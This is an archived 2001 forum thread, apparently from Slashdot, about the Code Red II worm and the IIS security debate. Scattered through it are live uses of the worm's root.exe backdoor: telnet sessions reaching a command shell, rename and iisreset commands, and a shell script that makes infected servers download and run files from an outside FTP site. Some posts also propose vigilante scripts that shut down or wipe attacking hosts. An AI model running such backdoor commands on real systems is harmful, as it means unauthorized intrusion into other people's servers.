I guess it depends on your choice of apps doesn't it. I use apache, proftpd, djbdns, and qmail (I don't run a news server). As far as I know there was a hack of proftpd in the last couple of years, an apache hack and nothing on qmail or djbdns. So a couple of the apps I sued needed to be updated at least once in the last year. Not too bad if you ask me especially considering apt-get upgrade and apt-get update are so easy to perform. Lucky for me I have literally dozens of high quality open source apps to choose from to run my services. I think I made the right choices by and large.

All in all I would put up the record of my apps against MS suite any day.

Ooops bad paste. Take two.

[nyet]

$ telnet x.x.x.x 80
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
GET /scripts/root.exe
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 05:51:06 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
c:\inetpub\scripts>

Re:Ooops bad paste. Take two.

[cyberdonny]

Wow, this does indeed work! But where do you get from there? Typing dir at the prompt seems to do nothing at all. Even using GET /scripts/root.exe?dir HTTP/1.0 does not work as expected.

Re:If this can't break Microsoft's back nothing wi

[nicodaemos]

This won't break Microsoft's back .... consumers voting with their feet can only achieve that end.

Recently I was looking around for a new insurance company. Looking on the web I came across a couple of companies who would give me a quote if I provided them with some personal information. I was all set to deal with one site, whom I won't name, but I decided to first do a quick background check on them. Using netcraft I was able to tell they were running their site on IIS. That little bit of info told me that they weren't at all serious about keeping my personal information confidential.

Of course I decided not to pursue any business with them. But I also went a step further. I wrote them a quick email informing them that I would never do business with a company who was choosing to base their internet business on the most hacked application platform on the internet.

Let companies know that you won't do business with them if they use inferior products. Your quick and simple message to them will speak more loudly than a thousand rants on various message boards.

Re:If this can't break Microsoft's back nothing wi

[IronChef]

A product that is given away and not sold can, I think, have a reliability disclaimer. But as soon as money is exchanged for goods or services you enter into a social contract. Things you buy shouldn't suck.

Re:A few more details:It's a root trojan

[dillon_rinker]

Wow! I didn't know a command prompt was a GUI!

Re:What about....

[cyberdonny]

For obvious reasons, the worm is programmed to ignore the 127.0.0.1 netinterface. However, all other interfaces, even 192.168., and 10. are fair game: the reasoning here is that scanning those will allow the worm to infect machines behind NAT routers.

logs

[Kryptolus]

automatically generated list of attacks against my server

147 attacks so far

the page is generated through a perl script that reads my apache logs

Re:logs

[interiot]

gzip -dcf /var/log/apache/* | grep '[NX][NX][NX][NX]'

Adjust the path to wherever your apache logs are.

Re:logs

[Pathwalker]

Not too many attacks where I am - so far this month I've seen the old worm 91 times, and the new worm only 13 times.

I'm making a nice graph of the infection attempts over time Here. It Should be fun to see how long it takes for version 2 to pass version 1.

Re:logs

[Saint+Nobody]

technically you should probably doing

grep -E 'NNNN|XXXX'

so you wouldn't catch "XNNX" and other such variations... not that it would even matter for the most part. i'm just being pedantic.

Re:logs

[Saint+Aardvark]

Crap, you're right....my bad. It's late and I should go to bed, but there's a horrible fascination in watching the comments roll in and seeing what this is doing...

Re:logs

[ncc74656]

Here's another list of Code Red attacks for your amusement. Apache logs to MySQL here, so I have a script that queries the database and formats the results into a table. The table is then inserted into the HTML with a server-side include. As of this post, I'm up to 972 attacks. Nearly half are from other Cox Express customers, and the total count is about an order of magnitude greater than when I last checked for Code Red activity on Friday.

I sent out email a while back to the 74 hosts known to be infected at the time. Hopefully a few of them will get a clue and fix their servers. (Then again, if they're running "Internet Infection Server" on publically-available servers, they must've been clue-deficient to begin with. :-) )

To see them live

[cybermage]

To see them come in live:

tail -f [log_file] | grep default.ida

To see just CR2, s/default.ida/default.ida\?XXX/

I got three while writing this. I was wondering what was slowing things down tonight.

Now that is funny!

[stuccoguy]

This guy's computer is infected and attacking me every 10 minutes or so. I went to his web page and found this resume which indicates the guy is a Windows2000 expert and Network Technician!

Re:Now that is funny!

[gascsd]

heh. he lives in my apartment complex, and i know exactly where his apartment is (i have a friend over there on that side of the complex). i'll go tell him his box got 0wN3d then hand him my 4.3R CD =)

a quick fix

[Swordfish]

Here's a perverse idea for a quick fix for CR2.

First, see here for how to telnet into the back door left by all CR2 infections. Second, write a script to telnet to all infected hosts which probe you on port 80 and shut down the offending machine. Third, run this script on your web server so that all hosts probing your site get shut down.

If everyone did this, then CR2 would disappear off the net within 24 hours, and we could all rest easy!

Re:a quick fix

[dozing]

Wouldn't the best and quickest fix be to telnet into the machines and give 'em the old:
c:\deltree windows

maybe we could even install scripts on our own servers to automatically do this each time we recieve a new attack. Automated windows repair solutions.

Re:a quick fix

[Malcontent]

According to the MS web site you don't need "expensive unix sysadmins" to install, configure and run MS servers. They tell their customers that sysadmins are not needed. You can't blame the clueless PHBs of the world when they believe MS can you? It hasn't occured to them that a MS employee who hasn't told ten lies by lunch will automatically be fired.

Re:a quick fix

[Malcontent]

Who can find anything on that insane web site. I know I have read an interview by an MS executive who said that. That was the talking point a while back when MS was talking up TCO.

Re:a quick fix

[sheldon]

Where is this statement that "sysadmins are not needed" located on the MS website?

Re:a quick fix

[unitron]

Wandering a little off-topic, how many machines out there have passwords known only to one person who has made no provision whatsoever for anyone else to have access to that password should they suddenly get hit by a bus or a meteorite, have a stroke or a coronary, or vanish in a puff of smoke due to insert your favorite religion here?

Re:a quick fix

[Saint+Aardvark]

Heh...there's a guy like that where I work who basically built the whole network. God alone knows what'll happen to us if he gets hit by a meteorite.

Re:CR2 Web Defacements

[baptiste]

Actually, accoridng tothe virus analysis on BUGTRAQ and eeye.com, CodeRedII does NOT deface the home page. However, CRv2 (2nd generation of the first Code Red worm, not the same as CodeRedII - got that? :) ) is still in teh wild and will deface the main page. Also, the Pobox worm has been around a long time. Or soem script kiddies are tossing these pages in using the root backdoor from CRII.

I tried to post the BUGTRAQ analysis from EEYE, but lameness filter choked on it

Top 8 things to do with Code Red

[startled]

Bah, what a waste. Screw that, here are some other things you should do along with your white hat program:

1. Distribute Elcomsoft's e-book reader to all compromised boxes; search for any Adobe e-books and write out a plaintext copy.
2. Append the code to DeCSS to all Word documents on the box.
3. Modify the code to only patch the box when Dmitry is finally released from jail.
4. Install Linux; reboot.
5. Install BSD; reboot.
6. Configure box to DoS MS's IIS patch servers; condemn MS for making patches inaccessible.
7. Script all boxes to respond to /. stories with one of two comments: "dammit, this is a duplicate! Here is the original at goatse.cx", or "Katz iz 4 t00l!!!1@".
8. Install SETI; add the box to your team; brag about your high score.

Note: these are jokes. Please, please, do not do these things. Especially because if you do, the feds will come knocking on my door. :)

It's not safe to install IIS while on a network...

[weave]

With this high a number if scans it is now suicidal to install IIS while connected to the net. Chances are very good that your box will get compromised before you have a chance to apply the patch, even if you do so right away. And since people can easily set up a reverse hack to automatically do other nasty stuff to your box after THEY get probed, the risk is even higher.

Solution, never ever have your box plugged into the network while installing a Windows server. Only plug it in after all patches, service packs, and hot fixes have been applied first.

Re:cisco 675 hanging.

[cowboy+junkie]

Welp, I've just tried changing the port to see how that will work (my connection has been up and down like a yo-yo for the past couple of days). Qworst doesn't have the 2.4.2 update available and for some reason Cisco doesn't want to make it available directly to customers.

On a lighter note, Qworst's support # had a 111 minute wait to talk to someone tonight...gotta love it...

Re:Rooted? Lemme get this straight....

[dillon_rinker]

Or my favorite techno-mangling of the English language:

administrated

Re:A few more details:It's a root trojan

[glokkpod]

I've been tinkering and I've found that this will help cure the "root exploit":

GET /scripts/root.exe?/c+ren+root.exe+infected.dat HTTP/1.0

Re:Neat little proggie I wrote..

[JediTrainer]

Thanks! I ran your proggy on my box, and here's what I got:

I'm in the 24.x.x.x range, so I'm getting bashed quite a bit.

Code Red 1:
Unique IPs: 105
Total hits: 105

Code Red 2:
Unique IPs: 172
Total hits: 395

This count is rising by the minute! No wonder my cable modem's been going nuts the last few days!

How to generate a list of ALL CRII infected hosts

[braddock]

This analysis at http://braddock.com/cr2.html describes a means through which a complete list of the thousands of CodeRed II infected and backdoor compromised hosts can be easily obtained by any individual who has been keeping a web server log of attempts on his machine, by using the backdoors on the machines that have attacked him to obtain the the web logs of the infected attacking IIS web servers to learn of new infected hosts.

Speakeasy's TOS

[Greyfox]

I seem to recall that Speakeasy will shut you down for "hacking activity," even if that activity occurred because your system was compromised. They pretty much demand that you keep your system secure in their TOS (Which I don't object to at all, mind you.)

Re:Something that should happen more often.

[Malcontent]

Wow that was in 1988. I'd say it's a pretty good record.

Let's count the number of IIS remote hacks and the number of apache remote hacks and see who wins.

Re:I'm getting pounded at 216.

[Saint+Aardvark]

Lots of arp who-has? I've been getting that here at 216. too...deliberately started up apache just to have something to catch the attemps, but nothing yet -- just all those damn arps. Makes for boring tcpdump watching, that's for sure...

Re:Hey... maybe we can use an M$ exploit to FIX th

[raju1kabir]

Why the hell would we need default.ida to xploit IIS? Plus, imagine how much bandwith would be wasted with that.. and more, Apache runs mostly on Linux or other Unix based OS, so CR is not efective against them..

Either you didn't read the message at all, or you are an extremely dumb person.

What he's suggesting is to set up Apache so that it will automatically repair any IIS servers that attack it.

Has nothing to do with whether Apache is vulnerable to anything.

Proposal for White Hat'ing CR][

[nebby]

Since it seems that it's possible to run, and basically do, anything trivially on any of these infected computers via the root.exe "script" I'm guessing that a lot of shit is going to go down in the next two days that will probably be both good and bad for Microsoft and the public's understanding of network security.

I'm also guessing that right now a bunch of /.'ers are doing one of two things:

1) Writing scripts to make things suck more for those who have been compromised (shame on you)
or
2) Writing scripts to fix the compromised servers

I propose that if a script is created to fix these servers (Code Green? :)) that it not be launched until after Monday afternoon around 3 or 4PM, since this is a serious problem for both sysadmin's and Microsoft. If a large part of the damage is avoided by white hat hackers sending a cure for the virus out, it will only happen again. If you don't give them time to sweat, then nothing will be changed and a even more malicious virus (which say, deletes the entire contents of the drives or something) will be unleashed soon enough.

So, before you go out and launch a cure for the problem, think twice about the long term effects of doing so. Create it, make sure it works, and then the Open Source movement can release a cure for the problem faster than anyone else and "we" (I'm not really part of the OSS movement, or whatever) will look like the good guys. Instead of the media holding Microsoft on high for providing the cure to a problem they caused, if the patch is done and ready and launched by Monday afternoon they will have egg on their faces.

Thanks.

[Fill in the blanks]

[LS]

I find it really [lame|!1337|st00pid|boring] how a joke will appear and everyone will copy it. Imagine if I had a [Beowulf cluster|DDoS network|Wireless network] full of bots posting stupid clones of jokes we already saw and laughed [never|once|more than we should have] at. [All your base belong to us|FUCK THINK GEEK|Once again, mod me down]. [Mod me down|be careful what you wish for, you will be modded down|shut up you schizoid freak]. Anyway, I'm drunk, as in [Free beer|Stupid assholes, where do you get free beer?|Stupid assholes, why are you trying to compare free speech with beer? I wonder why you get so little public support|Hey, did you see Dune the mini series? It ROCKED!] [Sorry, do punctuation marks go AFTER or BEFORE the bracket?]?

[Anyway|Moving On|Madlibs are for 7 year olds at birthday parties high on sugar and plastic toy fumes], I hope we have come to an understanding that [transparent cases|shock the penguin - FUCK COMPAQ|old men with extremely wide assholes pictured on Christmas Island websites] are no longer [novel|interesting|clever.].

Bookmarklet for IIS detection?

[Cato]

I'm not a JavaScript person, but how about writing a bookmarklet to take the current page's URL and query Netcraft for use of IIS and warn the user if it is? Bookmarklets are bookmarks that run small JavaScript programs - more info at http://www.bookmarklets.com/

@home problems...

[garett_spencley]

Slow service? I don't know about other @home customers (I'd like to hear) but my net connection was completely _down_ for about 8 hours this afternoon. As a matter of fact I just got back on.

The interesting thing was that the "cable" light on my cable modem was still on when usually when I can't get on the net it is off.

So I wonder what the problem really was. If maybe the routers were all up but the dhcp servers were down or something....

Anyone else have similar problems?

--
Garett

Re:@home problems...

[garett_spencley]

When service was down, I would ping my subnet's default gateway, and not receive a response. I subscribe to 2 IPs, on different subnets, and they've both been affected at various different times.

But when that happens the light on the cable modem goes out. So it wasn't router issues.

Personally, I feel that if this continues, @Home needs to credit me back part of my subscription fee.

Yeah I'm thinking of switching to DSL personally. I know that this particular situation was not @home's fault (well, that is up for debate since if they didn't deploy IIS none of this would happen) but I've been experiencing really shitty service ever since I subscribed. A lot of down time really often.

--
Garett

Re:@home problems...

[coyote-san]

@Home could block inbound HTTP queries (port 80, destination address in their block) without affecting outbound HTTP queries or their responses.

However, is this practical? It's hard to say - it should really be done at the lowest subnets, and that would take some effort to set up. Then again, the cost of doing nothing is rapidly adding up - my modem light has been on continuously for 24 hours. I haven't see this since I downloaded the ~20GB TIGR GIS data set. :-)

Re:If this can't break Microsoft's back nothing wi

[cybrthng]

Well, i do run linux at home, but at work they require windows for the sake of office which i don't use anyhow. (i'm a DBA, i sit on Sun boxen all day writing sql code or fixing databases from a shell prompt).

Even for windows users, a 120.00 linksys box and some know how will protect you. Atleast close the blatent problems and protect your internal network.

People need to realise it is like putting locks on the doors to your house. Unless your safe and secure your allowing *ANYONE IN!*

Re:A few more details:It's a root trojan

[Malcontent]

Every system shows an occational defect. With MS it's an epidemic. Every week it's a new exploit.

Re:Source?

[Maditude]

Here's a speedy one...

#!/bin/sh
grep default.ida /var/log/httpd-access.log | cut -f 1 -d ' ' | sort

Re:Why not fight back ???

[fanatic]

Microsoft's did it in advance with the EULA

Most courts still find licenses imposed after purcahse to be meaningless. These are nothing more (unless you live in Maryland or Virginia, where UCITA has already passed) than an attempt to convince you that you don't have the rights that you in fact do.

This is why UCITA is such an evil piece of crap. EULAs would be binding under UCITA.

Re:Does anyone know....

[J'raxis]

It's software-based, not hardware-. This is not a "computer worm," it's a Windows worm. Much like the ones that only attack Outlook, this one only travels through IIS, Microsoft's webserver.

Re:Why don't they...

[Malcontent]

Yes because MS does nto have enough programmers or enough money or enough computers to actually do this themselves. We should all roll up our sleeves and provide free labor for MS. Of course we should also ignore them when they call us communists, an-american and a "cancer". After all they need our help in fixing their broken systems.

File download script

[nebby]

I played around for a few hours with this, trying to make a ghetto script that would fix the servers. There's no way for me to be sure my other stuff works, but the thing I did get working was a script to download files to the infected server from an ftp site.


#!/bin/sh
# Code Red ][ Download File script
# Usage: dlfile.sh infectedIP filename
#
# Please set the $ftp and $dir values to
# the ftp and directory of the patch and shutdown repository

# For ftp.youhavesetup.com
FTP="ftp%2eyouhavesetup%2ecom"
# Directory /pub/cr
DIR="%2fpub%2fcr"

echo GET /scripts/root.exe?+%2fc+echo+bin+%3etmpfile | telnet $1 80
sleep 1
echo GET /scripts/root.exe?+%2fc+echo+get+$DIR%2f$2+%3e%3et mpfile | telnet $1 80
sleep 1
echo GET /scripts/root.exe?+%2fc+echo+ftp+%2dA+%2ds%3atmpfi le+$FTP+%3edlfile%2ec
md | telnet $1 80
# Note that slashcode inserts a space in the string 'tmpfile' on both these lines, remove before running
sleep 1
echo GET /scripts/root.exe?+/k+dlfile%2ecmd | telnet $1 80

I tried setting it up and got the servers to download the patches, but I can't be sure that they are actually run. (I don't have an infected machine to test.) Also, I was unable to figure out a way to get the machines to reboot or restart IIS. It appears root.exe has limited permission in what it can do (as another poster or two stated.) There might be hacks that will do what I want to, but I'm too tired to mess with this anymore :)

Re:But does it actually *do* anything different?

"Antony Riley has further made a tentative confirmation that the new worm installs a back door that leaves the server wide open for attack (a command shell is available by using telnet to access the server)." from today's diary entry at a well known worm incident place (please don't post the url, I don't want them swamped; I already can't get thru to another place that posted an url that gives further details).

Why don't they...

[Greyfox]

Modify the code red code to apply the security patch to the vulnerable IIS servers and reboot the system? While this is potentially destructive to your system (I'm told -- MS security patches and all that) it would pretty well take care of this problem...

Something that should happen more often.

[RzUpAnmsCwrds]

Man, I'm glad that I'm not using [Microsoft Product]. This new [virus/worm/trojan] exploits a [flaw/bug/backdoor] in [Microsoft Product], and it [does/doesn't] use Outlook and the stupidity of users. Luckily, I'm running [Free alternative to Microsoft product], so I'm not at risk. In fact, [Free alternative to Microsoft product] has protected me from [any integer over 200] [viruses/worms/trojans]. And just look at the [hundreds/thousands/millions/billions] of dollars that I've saved using [Free alternative to Microsoft product]. I hope that this [Free alternative to Microsoft product] takes off, along with [free alternative to Microsoft OS]. Unfortunately, my [company/home] has to pay for the stupidity of Microsoft: this [virus/worm/trojan] sucked [250KB/250MB/250GB/250TB] of bandwidth!

Re:Something that should happen more often.

[Malcontent]

Since I happen to use debian I am subscribed to the security listserve.

Once again. Let's count the number of remote expoits for apache and IIS and decide which system is more secure. So far you have pointed out two defects. One in 1988 which was a worm and one recently which allowed directory listings (but no code excution). I'd say that's an admirable track record.

Wehn confronted with these facts any sysadmin who continues to use a insecure system like IIS is criminally negligent. Any organization which chooses to deploy such an unsecure web server ought to be sued.

Re:Something that should happen more often.

[sheldon]

IIS consists of:

Web Server
FTP Server
Indexing server
SMTP server
NNTP server

and maybe a slew of other things, if you consider IIS4 shipped with MTS and MSMQ.

So in comparing IIS to Apache you are limiting the scope of the argument, which might seem clever to you, but is unfair.

How many exploits have their been to mail and ftp servers on Linux?

what MS has done.

[jon_c]

If you go to microsoft.com you will not see anything about CodeRed. however a quick search will find you this which is that patch.

One nice thing about the worm is that it is only active in memory, meaning that if you reboot your machine it will die.

The unfortunate part is that I don't see it helping much. I think the problem is that thousands of neglated NT/2K boxes with net connections, collecting dust, and getting eaten by worms. Soon this will be called the infected net, the part of the internet that has withered into sludge and pounds away at the rest of the net.

After a while the media will infect the people, soon follows the lawmakers. once that happens the goverment will madate that computers on the public net must be licenced, and maintained regularly. if you computer is infected by a worm, virus, trojan etc.. you will be issued a fine. the internet will be taxed to support the "federal internet saftey commision". a group of FCC regects that constantly moniter and scan you box to make sure you up to code.

-Jon

This is great

[GC]

root@gate:~# telnet x.x.x.x 80
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
GET /scripts/root.exe?/c+iisreset HTTP/1.0

HTTP/1.1 502 Gateway Error
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 14:43:22 GMT
Content-Length: 215
Content-Type: text/html

Error in CGI Application
CGI ErrorThe specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:

Connection closed by foreign host.
root@gate:~# telnet x.x.x.x 80
Trying x.x.x.x...

Re:This web page was changed...

[Saint+Aardvark]

Just wanted to share my shell script for getting a handy page w/links to all the infected sites I've logged:

grep ida /foo/bar/log | awk '{print $1}' | sort | uniq |\
awk '{print "" $1 "
"}'

So 3133t it hurts...

Re:Would you like some cheese to go with your whin

[cybrthng]

waaaa waaaaa if no one asked why, then we wouldn't be here

Hypothesis

[nebby]

I bet they launched it on Saturday morning on purpose (or Friday night even.) By the time Sunday is over, the hacker(s) will have root access to a shitload of computers, and the sysadmins who hesitated patching showing up Monday morning will have long been 0wned.

Like someone said elsewhere, the best (and only I think) way to partially fix this problem is to write a variant of the worm (Code Green? :)) that fixes all the servers before it gets out of hand. Apache server or not, if 100,000 computers are infected, the traffic costs of Code Red 1, 2, etc. hits alone will be enough of a incentive to fix the IIS servers. (Though it is kind of exciting to think of Microsoft having egg on their faces Monday morning when they get DoSed by 100,000 cable modems in one deafening yell.. but I digress)

Re:There's been stacks of Unix worms this year

[Malcontent]

Most services can be jailed.

BTW Linux has permission systems if you choose to implement them. Unlike the windows world we get choices.

Re:There's been stacks of Unix worms this year

[Malcontent]

There are filesystems which support ACLs you ought to look into them. As you stated there are also capability systems you can implement.

Weather to chroot services or not is a decision made by the sysadmin.

What about....

[jarodss]

My range, I don't seem to find anything coming from 127.x.x.x and I installed CodeRedII myself.

Re:It's not safe to install IIS while on a network

[Bob+Uhl]

It's not safe to install IIS or any MS OS. Period. Don't plug it in after you've installed; you know that you'll be hit again. Install a real OS--Linux, FreeBSD, OpenBSD, NetBSD--and go to town. They're all general-purpose OSes. They can all do what you need. Deal with their problems; it's better than deal with Microsoft's.

Re:If this can't break Microsoft's back nothing wi

[Bob+Uhl]

The reason the "core functionality" of your PC is "allowed" to distribute your private information is because it has to be able to do so if you're going to write emails to your friends. Not quite (or at least, not the way you're thinking, I believe). An OS with capabilities doesn't have quite the same issue. Essentially, a capability is permission to do something: see a file, read it, execute it, open a network connection. In such an OS, the web server is giving capabilities to: see everything in its docroot; execute everything in it cgi-bin; receive network connexions. It cannot read your personal data; it cannot open its own network connexion. Done right, it cannot even access libraries it doesn't use.

Capability systems are far more complex than older, permissions-based systems. But don't we owe it to ourselves to use some of our spare CPU cycles and bytes to actually do something? With the right administration tools, capabilities should be doable. And worms like Code Red would be made much more difficult.

Re:If this can't break Microsoft's back nothing wi

[Bob+Uhl]

A previous poster quoth:

The reason the "core functionality" of your PC is "allowed" to distribute your private information is because it has to be able to do so if you're going to write emails to your friends.

Bear with me--trying to break the no-dups posting rule...

Not quite (or at least, not the way you're thinking). An OS with capabilities doesn't have quite the same issues as one without. Essentially, a capability is permission to do something: see a file, read it, delete it, execute it, open a network connection. In such an OS, the web server is giving capabilities to: see everything in its docroot; execute everything in it cgi-bin; receive network connexions. It cannot read your personal data; it cannot open its own network connexion. Done right, it cannot even access libraries it doesn't use. It's a very interesting concept.

Capability systems are much more complex than older, permissions-based systems; they can be much slower. But don't we owe it to ourselves to use some of our spare CPU cycles and bytes to actually do something useful, such as prevent break-ins? With the right administration tools, capabilities should be about as easy as current permission systems. And worms like Code Red would be made much more difficult. Not impossible--but more difficult.

Damn bloody no-resumbit code sux. Have to change this article enough to let the blankety-blank slashcode let me through 'cause I made a mistake on the previous post. Bloody friggin heck.

And the stupid 20-second rule is getting me now.

Re:If this can't break Microsoft's back nothing wi

[IronChef]

- Operating systems are more complex than cars.
- Operating systems don't require a license to be operated.


Irrelevant. There are plenty of products that are more complex than cars, and consumers are still protected if they fail dramatically. Pharmaceuticals, for example. Designing a molecule and testing it is at least as difficult as designing a car.

Do you seriously think that the complexity of the product is an excuse? That's crazy. Far better to ask the companies to simply know their limitations, and not ship products that they can't build to reasonable standards of quality.

The licensing issue is irrelevant too. If my microwave catches fire, I can sue somebody. If my custom-built house collapses, I can sue somebody. If my shotgun explodes, I can sue somebody.

I don't mean to sound sue-crazy -- but the only deterrent we, the public, have, is our ability to use the legal system to whack companies that try to pull a fast one on us. If we lose that ability, we'll have nothing but crap to choose from.

Re:Why good people use bad webservers

[sheldon]

Isn't this what an IT department should be doing?

If the marketing department had installed a default install of RedHat 6.2 without patching it'd also be full of holes.

But would this have magically made the marketing department more clueful?

I don't see how.

There's been stacks of Unix worms this year

[Nailer]

There's been stacks of Unix worms this year:

* l10n
* adore
* Red Worm
and a whole bunch of variants.

And there will be more in the future as Linux becomes more mainstream. A virtus would also be compltely possible - sure, default permissions mean a virtus acting on behalf of an ordinary user can't do nasty thigns to `cp', but it can delete that users last 5 years of work.

Linux still lacks a real permission system, and there are unfotunately still many apps which run with unnecessary root privileges, rather than single-root-cpomponent (think Postfix) or 2.4s capabilities (think ProFTPd).